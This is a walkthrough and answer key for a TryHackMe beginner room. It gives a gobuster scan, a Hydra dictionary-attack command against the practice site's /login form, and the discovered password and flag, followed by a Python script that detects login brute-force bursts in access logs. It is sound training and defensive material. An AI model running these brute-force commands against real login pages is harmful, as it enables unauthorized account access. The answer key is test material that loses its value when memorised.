Room: https://tryhackme.com/room/becomeahacker
This walkthrough explains how to find hidden pages, scan websites, and perform a simple password attack using common tools. It helps beginners understand basic web hacking and vulnerability discovery concepts.
Task 2: Finding Weaknesses
Using the manual or automated methods described above, what hidden web page did you discover?
/login
Based on your Gobuster scan results, what status code is returned when accessing the hidden page?
200
Solution for both:
gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt
Task 3: Exploiting Weaknesses
Using either manual testing or an automated dictionary attack, what password did you discover for the admin user?
qwerty
Solution:
hydra -l admin -P passlist.txt www.onlineshop.thm http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
After logging in using the password found, what secret message is displayed on the page?
THM{born_to_hack!}
Solution:

Review the output of your Hydra dictionary attack. How many password attempts were made before the correct password was found?
17
Solution:
Reviewing the Hydra dictionary attack output shows that 17 password attempts were made before the correct password was found.
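
How the dictionary attack against /login looks from the server side, as an added example that is not part of the original walkthrough or the room: a sliding-window count of POSTs to /login per client IP over a web access log. The combined log format, the IP addresses, the 10-requests-in-60-seconds threshold and the sample log lines are all constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Fields needed from a combined-format access log line (format is an assumption).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    """Return (ip, timestamp, method, path-without-query) or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"].split("?")[0]

def find_login_bursts(lines, path="/login", threshold=10, window=timedelta(seconds=60)):
    """Map each IP to its peak count of POSTs to `path` inside any `window`,
    keeping only IPs whose peak reaches `threshold`. Lines must be in time order."""
    recent = defaultdict(deque)   # per-IP timestamps still inside the window
    peak = defaultdict(int)
    for line in lines:
        rec = parse(line)
        if rec is None or rec[2] != "POST" or rec[3] != path:
            continue
        ip, ts = rec[0], rec[1]
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

def build_sample():
    """Constructed log: 17 rapid login POSTs from one client, 2 slow ones from another."""
    base = datetime.strptime("01/Jan/2025:10:00:00 +0000", TS_FMT)
    def row(ip, offset, status, method="POST", path="/login"):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "-"'
    rows = [row("10.10.0.5", i, 200) for i in range(17)]
    rows += [row("10.10.0.9", 0, 200), row("10.10.0.9", 300, 302)]
    rows.append(row("10.10.0.9", 360, 200, method="GET", path="/"))
    return rows

if __name__ == "__main__":
    for ip, n in find_login_bursts(build_sample()).items():
        print(f"{ip}: {n} POSTs to /login within 60 s")
```

A per-IP threshold like this is a starting point for alerting; account lockout or rate limiting on the login form is what actually stops the guessing.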

That's a wrap!